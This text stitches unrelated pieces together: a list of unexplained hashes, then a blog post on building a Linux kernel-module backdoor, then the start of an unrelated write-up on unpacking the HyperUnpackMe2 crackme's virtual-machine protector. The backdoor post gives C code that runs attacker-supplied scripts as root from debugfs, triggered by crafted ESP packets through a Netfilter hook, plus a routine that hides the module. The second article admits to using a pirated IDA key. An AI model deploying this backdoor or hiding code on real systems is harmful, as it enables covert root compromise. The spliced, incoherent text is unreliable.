  • cd4d1a6b3efb3d280b8d4e77e306e05157f6ef8a226d7db08ac2006cce95997c
  • 78a07502443145d762536afaabd4d6139b81ca3cc9f8c28427ec724a3107e17b
  • 729ab4ff5da471f210a8658f4a7b2a30522534a212ac44e4d76f258baab19ccb
  • ca0df32504d3cf78d629e33b055213df5f71db3d5a0313ebc07fe2c05e506826
  • fc9d150d1a7cbda2600e4892baad91b9a4b8c52d31a41fd686c21c7801d1dd8c
  • bf2984b866c449a8460789de5871864eec19a7f9cadd7d883898135a4898a38a
  • 9d817d77b651d2627e37c01037e13808e1047f9528799a435c7bc04e877d70b3
  • 8fdec2e23032a028b8bd326dc709258a2f705c605f6222fc0c1616912f246f91
  • dbe165a63ed14e6c9bdcd314cf54d173e68db9d36623b09057d0a4d0519f1306
  • 64f96042ab880c0f2cd4c39941199806737957860387a65939b656d7116f0c7e
  • e394b1a1561c94621dbd63f7b8ea7361485a1f903f86800d50bd7e27ad801a5f
  • 506647c5bfad858ff6c34f93c74407782abbac4da572d9f44112fee5238d9ae1
  • 194362ce71adcdfa0fe976322a7def8bb2d7fb3d67a44716aa29c2048f87f5bc
  • 3652ea75ce5d8cfa0000a40234ae3d955781bcb327eecfee8f0e2ecae3a82870
  • 97d41633e74eccf97918d248b344e62431b74c9447032e9271ed0b5340e1dba0
  • a8ab5be12ca80c530e3ef5627e97e7e38e12eaf968bf049eb58ccc27f134dc7f
  • 37bea5b0a24fa6fed0b1649189a998a0e51650dd640531fe78b6db6a196917a7
  • 7e750be346f124c28ddde43e87d0fbc68f33673435dddb98dda48aa3918ce3bd
  • fcb700dbb47e035f5379d9ce1ada549583d4704c1f5531217308367f2d4bd302
  • b638dcce061ed2aa5a1f2d56fc5e909aa1c1a28636605a3e4c0ad72d49b7aec6
  • f2e4528049f598bdb25ce109a669a1f446c6a47739320a903a9254f7d3c69427
  • afd7ab6b06b87545c3a6cdedfefa63d5777df044d918a505afe0f57179f246e9
  • 9b654fd24a175784e3103d83eba5be6321142775cf8c11c933746d501ca1a5a1
  • e6c717b06d7ded23408461848ad0ee734f77b17e399c6788e68bc15219f155d7
  • e302aa06ad76b7e26e7ba2c3276017c9e127e0f16834fb7c8deae2141db09542
  • d020ea8159bb3f99f394cd54677e60fadbff2b91e1a2e91d1c43ba4d7624244d
  • 36104d9b7897c8b550a9fad9fe2f119e16d82fb028f682d39a73722822065bd3
  • d20cd3e579a04c5c878b87cc7bd6050540c68fdd8e28f528f68d70c77d996b16
  • ee859581b2fcea5d4ff633b5e40610639cd6b11c2b4fc420720198f49fbd1d31
  • ef2c384c795d5ca8ce17394e278b5c98f293a76047a06fc672da38bb56756aec
  • bd56db8d304f36af7cb0380dcbbc3c51091e3542261affb6caac18fa6a6988ec
  • 086d989f14e14628af821b72db00d0ef16f23ba4d9eaed2ec03d003e5f3a96a1
  • f44c3fd546b8c74cc58630ebcb5bea417696fac4bb89d00da42202f40da31354
  • 320bb1efa1263c636702188cd97f68699aebbb88c2c2c92bf97a68e689fa6f89
  • 42faf3af09b955de1aead2b99a474801b2c97601a52541af59d35711fafb7c6d
  • 6e0adfd1e30c116210f469d76e60f316768922df7512d40d5faf65820904821b
  • eea2d72f3c9bed48d4f5c5ad2bef8b0d29509fc9e650655c6c5532cb39e03268
  • 1a31e09a2a982a0fedd8e398228918b17e1bde6b20f1faf291316e00d4a89c61
  • 042efe5c5226dd19361fb832bdd29267276d7fa7a23eca5ced3c2bb7b4d30f7d
  • 274717d4a4080a6f2448931832f9eeb91cc0cbe69ff65f2751a9ace86a76e670
  • f8751a004489926ceb03321ea3494c54d971257d48dadbae9e8a3c5285bd6992
  • d5a296bac02b0b536342e8fb3b9cb40414ea86aa602353bc2c7be18386b13094
  • 49cfeb6505f0728290286915f5d593a1707e15effcfb62af1dd48e8b46a87975
  • 5f2b13cb2e865bb09a220a7c50acc3b79f7046c6b83dbaafd9809ecd00efc49a
  • 5a5bbc3c2bc2d3975bc003eb5bf9528c1c5bf400fac09098490ea9b5f6da981f
  • 2c025f9ffb7d42fcc0dc8d056a444db90661fb6e38ead620d325bee9adc2750e
  • aaa6ee07d1c777b8507b6bd7fa06ed6f559b1d5e79206c599a8286a0a42fe847
  • ac89400597a69251ee7fc208ad37b0e3066994d708e15d75c8b552c50b57f16a
  • a11bf4e721d58fcf0f44110e17298f6dc6e6c06919c65438520d6e90c7f64d40
  • 017bdd6a7870d120bd0db0f75b525ddccd6292a33aee3eecf70746c2d37398bf
  • ae366fa5f845c619cacd583915754e655ad7d819b64977f819f3260277160141
  • 9b40a0cd49d4dd025afbc18b42b0658e9b0707b75bb818ab70464d8a73339d52
  • 57daa27e04abfbc036856a22133cbcbd1edb0662617256bce6791e7848a12beb
  • 6c54b73320288c11494279be63aeda278c6932b887fc88c21c4c38f0e18f1d01
  • ba644e050d1b10b9fd61ac22e5c1539f783fe87987543d76a4bb6f2f7e9eb737
  • 21a83eeff87fba78248b137bfcca378efcce4a732314538d2e6cd3c9c2dd5290
  • 2566b0f67522e64a38211e3fe66f340daaadaf3bcc0142f06f252347ebf4dc79
  • 692ae8620e2065ad2717a9b7a1958221cf3fcb7daea181b04e258e1fc2705c1e
  • 426bc7ffabf01ebfbcd50d34aecb76e85f69e3abcc70e0bcd8ed3d7247dba76e

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Defeating HyperUnpackMe2 With an IDA Processor Module

1.0 Introduction

This article is about breaking modern executable protectors. The target, a crackme known as HyperUnpackMe2, is modern in the sense that it does not follow the standard packer model of yesteryear wherein the contents of the executable in memory, minus the import information, are eventually restored to their original forms.

Modern protectors mutilate the original code section, use virtual machines operating upon polymorphic bytecode languages to slow reverse engineering, and take active measures to frustrate attempts to dump the process. Meanwhile, the complexity of the import protections and the amount of anti-debugging measures has steadily increased.

This article dissects such a protector and offers a static unpacker through the use of an IDA processor module and a custom plugin. The commented IDB files and the processor module source code are included. In addition, an appendix covers IDA processor module construction. In short, this article is an exercise in overkill.

NOTE: all code snippets beginning with «ROM:» come from the disassembled VM code; all other snippets come from the protected binary.

HyperUnpackMe2 is provided as an ancillary to this article and includes:

  • codeseg—lightly—commented.idb: IDB of Virtual Machine (VM)
  • dumped.exe: Statically unpacked executable
  • Notepad.idb: IDB of packed executable
  • processor_module_source.zip: Source code for IDA processor module
  • th.w32: IDA processor module

The processor module (th.w32) belongs in %IDADIR%\procs. It requires IDA 5.0, as do both of the IDBs. Although I own IDA 5.0, these IDBs are linked with the pirated 5.0 key. This is due to the fact that IDB files contain the majority of your personal keyfile. Hence, the IDBs will stop working under 5.1, unless you patch out the blacklist code (which is trivial). If you are a legitimate customer of IDA and would like IDBs for a later version, contact me under the information at the bottom of the article.

 1.1 Modern Protectors

Protectors of generations past mainly compress/encrypt the original contents of the executable’s sections; redirect the entrypoint to a new section that contains the decompression/decryption stub mixed in with anti-disassembly and anti-debugging techniques; strip the import information at protect-time and rebuild the import address tables at runtime; and finally transfer control back to the original entrypoint. In other words, while the sections’ contents are modified on disk, they are mostly (with the exception of the import information) restored to their original state before execution is transferred back to the original program. Although there are some protectors which are exceptions, this is the basic idiom.

To unpack such protectors, execution is traced back to the original entrypoint, the process is dumped to create a new executable, and the import information is rebuilt. ImpRec and a sufficiently patched debugger are all that is needed to unpack protectors of this variety.

Rather than having an unmolested image in memory, new protectors are applying transformations to the original code in an effort to thwart understanding it and to make dumping the executable more difficult. Examples include converting portions of the code into proprietary byte-code formats which are executed by an embedded interpreter (so-called virtualization, virtual machines or VMs) and copying portions of the code elsewhere in the process’ address space (so-called stolen bytes, stolen functions). These techniques are now mainstream in all areas of software protection, from crackmes and commercial packers to industrial-grade protections.

 1.2 Transformations Applied by HyperUnpackMe2 to the Original Code

HyperUnpackMe2 extensively modifies the original code, and the entirety of the packer code is executed in a virtual machine. The anti-debugging is heavy and some of it is novel.

By quickly examining the code at the beginning of the binary, we notice the following:

  • Direct inter-module API calls are replaced with int 3 / 5x NOP. It is not known a priori whether these are fixed up directly, or whether they actually require a trip through a SEH. This could be problematic: think about Armadillo. Thunks to APIs are similarly obfuscated. The relevant data in the original IIDs and IATs have been zeroed.
  • Instructions which reference imports without calling them directly, i.e.
        .text:01004462  mov     esi, ds:__imp__lstrcpyW@8 ; lstrcpyW(x,x)
    

    have been replaced with zeroes. However, the surrounding context remains the same:

        TheHyper:0103A44D    push    ebx
        TheHyper:0103A44E    mov     ebx, [esp+8]
        TheHyper:0103A452    push    esi
        TheHyper:0103A453    db 0,0,0,0,0,0
        TheHyper:0103A459    push    edi
        TheHyper:0103A45A    push    _szAnsiText
        TheHyper:0103A460    push    ebx
        TheHyper:0103A461    call    esi
    

    So clearly, the missing instructions must be re-inserted (in some form) into the code before it’ll execute properly. Perhaps this happens via a trip through the virtualizer, perhaps they’re patched directly, perhaps a SEH-triggering event is patched in. Without further analysis, we have no way of knowing.

  • Intra-module calls are replaced with call $+5. It seems likely that these references are directly fixed up prior to execution; this turns out not to be the case (the ‘directly’ part is false).
  • Long jump instructions have had their targets replaced with a zero dword.
        .text:010023CE E9 00 00 00 00    jmp     $+5
    

    Again, it’s unknown what sort of obfuscation is being applied here.

  • Functions have been stolen, with zeroes left behind in place of the original code. These functions have been deposited towards the end of the packer section.
        .text:01001C5B                   ; __stdcall SetTitle(x)
        .text:01001C5B 00                _SetTitle@4     db    0
        .text:01001C5C 00                                db    0
        .text:01001C5D 00                                db    0
        .text:01001C5E 00                                db    0
    

 

 2.0 Virtual Machines

Although VM assembly languages are often simple, VMs pose a challenge because they severely dilute the value of existing tools. Standard dynamic analysis with a debugger is possible, but very tedious because of the low ratio of signal to noise: one traces the same VM parsing / dispatching code over and over again. Static analysis is broken because each different VM has a different instruction encoding format (and this can be polymorphic). Patching the VM program requires a familiarity with the instruction set that must be gained through analysis of the VM parser. Basically, reverse engineering a VM with the common tools is like reverse engineering a scripted installer without a script decompiler: it’s repetitious, and the high-level details are obscured by the flood of low-level details.

 2.1 General Setup of VM Protections

The virtual machine needs an environment to execute in. This is generally implemented as a structure, hereinafter «the VM context structure». Each VM is different, but of the ones I’ve encountered thus far, each is based on the concept of a register architecture, and so the VM context structures typically consist of registers, flags, and various pointers (e.g. stack, maybe a heap of some sort, or a static data section).

Before the first instruction is executed, the VM context structure is allocated, and the registers and pointers are initialized, which usually involves allocating memory (perhaps on the host stack) for the VM stack.

After initialization, the archetypal VM enters into a loop which:

  • Decodes instructions at VM_context.EIP,
  • Performs the commands specified by the instruction, and then
  • Calculates the next EIP.

The process of execution usually involves examining the first byte of the instruction and determining which function/switch statement case to execute.

Eventually, the VM reaches some stop condition, and either exits or transfers control back to the native processor.

 3.0 Description of HyperUnpackMe2’s VM Harness

The HyperUnpackMe2 VM context structure contains sixteen dword registers, including ESP, which can each be accessed as a little-endian byte, word, or dword. There is an EIP register and an EFLAGS register as well. There is a pointer to the VM data (which is where EIP begins), and its length. The structure is zeroed upon creation. Its declaration follows. See the included x86 IDB for all of the gory details.

    struct TH_registers
    {
        unsigned long rESP;    unsigned long r1;    unsigned long r2;
        unsigned long r3;      unsigned long r4;    unsigned long r5;
        unsigned long r6;      unsigned long r7;    unsigned long r8;
        unsigned long r9;      unsigned long rA;    unsigned long rB;
        unsigned long rC;      unsigned long rD;    unsigned long rE;
        unsigned long rF;
    };
    
    struct TH_context
    {
        unsigned char *vm_data;
        unsigned long vm_data_len;
        unsigned char *EIP;
        unsigned long EFLAGS;
        TH_registers registers;
        TH_keyed_mem keyed_mem_array[502];
        unsigned long stack[0x9000/4];
    };

 

 3.1 Instruction Encoding

The HyperUnpackMe2 VM consists of 36 instructions, split up into five groups. Each group has a different instruction encoding format, with a few commonalities. The commands understood by the VM are the following (non-obvious ones will be explained in detail in subsequent sections):

  • Group One: Two-operand arithmetic instructions:
    • mov, add, sub, xor, and, or, imul, idiv, imod, ror, rol, shr, shl, cmp
  • Group Two: One-operand arithmetic and general instructions:
    • push, pop, inc, dec, not
  • Group Three: One-operand control flow instructions:
    • jmp, jz, jnz, jge, jg, jle, jl, vmcall, x86call
  • Group Four: Memory-related instructions:
    • valloc, vfree, halloc, hfree
  • Group Five: Miscellaneous instructions:
    • getefl, getmem, geteip, getesp, retd, stop

The VM itself is heavily based on the x86 architecture, as evident from the following snippets:

    TheHyper:0104A159 VM_set_flags_dword:
    TheHyper:0104A159                 cmp     [edi], esi
    TheHyper:0104A15B                 pushf
    TheHyper:0104A15C                 pop     [eax+VM_context_structure.EFLAGS]
    
    TheHyper:0104A316 VM_jz:
    TheHyper:0104A316                 push    [eax+VM_context_structure.EFLAGS]
    TheHyper:0104A319                 popf
    TheHyper:0104A31A                 jnz     short loc_104A31F
    TheHyper:0104A31C                 mov     [eax+VM_context_structure.EIP], edi
    TheHyper:0104A31F loc_104A31F:
    TheHyper:0104A31F                 jmp     short VM_dispatcher_13h_locret

The VM is using the host processor’s flags in a very literal fashion. Group one and two, and to some extent group three, instructions are implemented very thinly on top of existing x86 instructions, reflecting the fundamental similarity of this virtual processor to it.

 3.2 X86 <-> VM Crossover

The x86call instruction, depicted below, switches the host ESP with the VM ESP, and transfers control to the x86 code pointed to by EDI (what EDI is depends on the specifics of the instruction’s encoding). The result of the function call is placed in virtual register #A. We’ll find out later that this functionality is only ever used to call small functions associated with the protector, so we don’t have to worry about alternative calling conventions and the clobbering of EDX and EBP by the function.

The switching of the host ESP with the VM ESP signifies that parameters to x86 functions are pushed onto the VM stack in the same order and manner as they would be if the calls were being made natively.

    TheHyper:0104A36A    mov     esi, esp
    TheHyper:0104A36C    mov     edx, [eax+VM_context_structure.VM_registers.rESP]
    TheHyper:0104A36F    mov     esp, edx
    TheHyper:0104A371    call    edi
    TheHyper:0104A373    mov     edx, [ebp+arg_0]
    TheHyper:0104A376    mov     [edx+VM_context_structure.VM_registers.rA], eax
    TheHyper:0104A379    mov     esp, esi

The stop instruction in group five, depicted below, is suspicious and looks like it’s used to transfer control back to OEIP. EBP, the frame pointer, points to the saved frame pointer coming into the function, which is the first thing pushed after the return address of the caller. Therefore, [ebp+4] is the return address.

    TheHyper:0104A69F    cmp     cl, 0FFh
    TheHyper:0104A6A2    jnz     short go_on_parsing
    TheHyper:0104A6A4    popa
    TheHyper:0104A6A5    mov     eax, [ebp+var_4_VM_context_structure]
    TheHyper:0104A6A8    mov     eax, [eax+VM_context_structure.VM_registers.rA]
    TheHyper:0104A6AB    mov     [ebp+4], eax    ; [ebp+4] = return address
    TheHyper:0104A6AE    leave
    TheHyper:0104A6AF    retn    8

We thus expect that the packer will return to OEIP by using the stop instruction, with OEIP in virtual register #A.

 3.3 Memory Keying

The virtual machine also maintains an associative array of memory locations. Each block of memory that it tracks has a keying tag associated with it. There are native functions to add memory pointers with keys, retrieve a pointer by passing in its associated key, remove a pointer given its key, and update a pointer given a key and a new block of memory to point to. Not all of these functions are accessible through the instruction set; they seem to be for debugging purposes.

Some of the memory blocks contain non-obfuscated x86 code, some obfuscated, some contain VM code, and some contain data.

The internal data structure for a keyed memory entry looks like the following:

    struct TH_keyed_mem
    {
        unsigned char *ptr;
        unsigned long key;
    };

Analyzing the functions which manipulate this structure can be slightly confusing due to negative structure displacements:

    TheHyper:0104A3DC    mov     [esi], edx           ; key
    TheHyper:0104A3DE    mov     [esi-4], eax         ; ptr
    TheHyper:0104A3E1    add     dword ptr [esi-4], 8 ; ptr

3.3.1 Initializing the Associative Array

During initialization, the VM calls a function which scans the VM’s data looking for all occurrences of the dword ‘$$$$’. For each instance found, it treats the next dword as the key, and takes the address of the dword following that as the pointer.

    ['$$$$'][4-byte key]^[arbitrary data]  ^:  pointer

3.3.2 Using the Associative Array

In the instruction set, group four specifically, there are two pairs of instructions which add and remove memory blocks from the internal associative array. The first pair allocates memory with VirtualAlloc, and the second pair uses HeapAlloc. There is no protection in the VM against attempting to de-allocate a block which wasn’t allocated in the first place.

Group five contains an instruction, getmem, to fetch a memory block given a key. Group three, the control-flow transfer instructions, can take memory keys as arguments. In other words, jmp/jcc key will transfer control into the memory region pointed at by the key. In fact, the first instruction executed by the VM is of the form jmp key, and this is the primary form of control-flow transfer in the VM.

 4.0 Static Analysis of HyperUnpackMe2’s VM Code

Based on the analysis of the VM dispatching harness, I constructed an IDA processor module to examine the code inside of the VM — dead and natively. As such, the anti-debugging tricks are generally beyond the scope of this article, but a brief discussion can be found in appendix A. See appendix B for information about writing IDA processor modules.

Beyond the anti-debugging, there’s a lot of anti-dump protection in this packer. The main «tricks» all involve the redirection of certain aspects of normal code execution.

  • The stolen functions are copied into VirtualAlloc’ed memory.
  • The API calls and API-referencing instructions point to obfuscated stubs which eventually redirect to their intended targets, which are actually in copies of the referenced DLLs, not the originals. There are 73 kilobytes’ worth of obfuscated stubs in the packer section.
  • Relative jumps and calls travel through tiny stub functions in VirtualAlloc’ed memory onto their destinations.

Further, all API references are changed to relatively-addressed varieties instead of direct references, i.e. 0xE8 [displacement to import] (call import_address) instead of 0xFF 0x15 [IAT entry] (call dword ptr [IAT entry]).

The point is to make dumping as hard as possible by creating a rigid reliance on the exact layout of the process’ address space as it exists during that particular invocation (including the VirtualAlloc’ed memory regions and copied DLLs), and by removing any trace of the import table.

The following sections fill in the gaps (no pun intended) left in section 1.2 by describing precisely what happens under the covers of the VM. In the course of examination, we find that the fixups for each type take place in clusters, with similar code being used repeatedly to perform the same type of fixup. This turns out to be all of the information needed to break the protection, resulting in an automatic, static unpacker for any binary packed with it (of which there are no more — TheHyper informed me that the protector was lost due to a disk crash).

 4.1 Stolen Functions

The first thing we’ll need to deal with are the missing functions. As we can see in the following snippet, it turns out that the functions are copied into allocated memory, and a long jump into the relevant function in allocated memory is inserted at the site of the function in the original code section. It should be noted that the stolen functions are still subject to the modifications described in subsequent sections.

    .text:01001B9A    ; __stdcall UpdateStatusBar(x)
    .text:01001B9A    _UpdateStatusBar@4 db 0B7h dup(0)
    
    ROM:0103AFAA    mov     r0B, 1038A82h ; location of function in the VM section
    ROM:0103AFB2    mov     r06, 0B7h     ; notice this matches up with the
    ROM:0103AFBA    push    r06           ; size of the stolen function above
    ROM:0103AFBD    push    r0B
    ROM:0103AFC0    push    r0F           ; points to a block of allocated mem
    ROM:0103AFC3    x86call x86_memcpy
    ROM:0103AFC9    add     rESP, 0Ch
    ROM:0103AFD1    mov     r0B, 1001B9Ah ; address of UpdateStatusBar
    ROM:0103AFD9    mov     r0E, r0F
    ROM:0103AFDD    sub     r0E, r0B
    ROM:0103AFE1    sub     r0E, 5        ; r0E is the displacement of the jmp
    ROM:0103AFE9    add     r0F, r06      ; point after the copied function
    ROM:0103AFED    mov     [r0Bb], 0E9h  ; assemble a long jmp
    ROM:0103AFF2    inc     r0B
    ROM:0103AFF5    mov     [r0B], r0E    ; write the displacement for the jmp

Locating these copies is easy enough: references to x86_memcpy following the final memory key are the ones which copy the stolen functions into VirtualAlloc’ed memory. We can easily extract the source of the copy and the destination of the write and copy the function back into its original real estate within the binary.

While we’re on the subject, when fixups are made to functions which have been copied into allocated memory, they are made as a displacement against the beginning of that memory. I.e. we might see a fixup of a long jump made against address [displacement + 100h]. Thus, in order to know where in the original binary this long jump is, we need to retain information about where the functions in the original binary are situated in the allocated memory.

For example:

    Displacement   0h into allocated memory -> 1001B9Ah
    Displacement  B7h into allocated memory -> 1001EEFh
    Displacement 11Dh into allocated memory -> 100696Ah

